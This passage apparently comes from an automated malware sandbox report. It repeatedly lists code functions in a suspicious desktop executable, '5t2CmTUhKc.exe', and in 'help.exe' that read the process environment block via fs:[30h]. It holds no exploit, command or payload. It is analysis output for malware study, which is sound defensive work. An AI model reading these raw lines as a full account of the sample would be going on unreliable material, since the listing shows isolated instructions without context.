Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B02990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AFC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00ADB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B641E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AF4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AF4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00ADC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00ADB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AFB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AEAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B02AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B02ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B14A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AE8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AF3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00ADAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B1927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B8B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B64257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B04BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AE1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B02397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B9138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B8D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AFDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B003E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B553CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B9131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B03B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00ADDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00ADDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00ADF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AE849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B914FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B91C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AF746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B6C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B01DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B035A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00BA05AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AD2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B88DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\5t2CmTUhKc.exe - Code function: 2_2_00B5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00BA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\5t2CmTUhKc.exeCode function: 2_2_00AEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B6F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00C08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B4849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B39080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BF14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00BB6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 11_2_00B358EC mov eax, dword ptr fs:[00000030h]
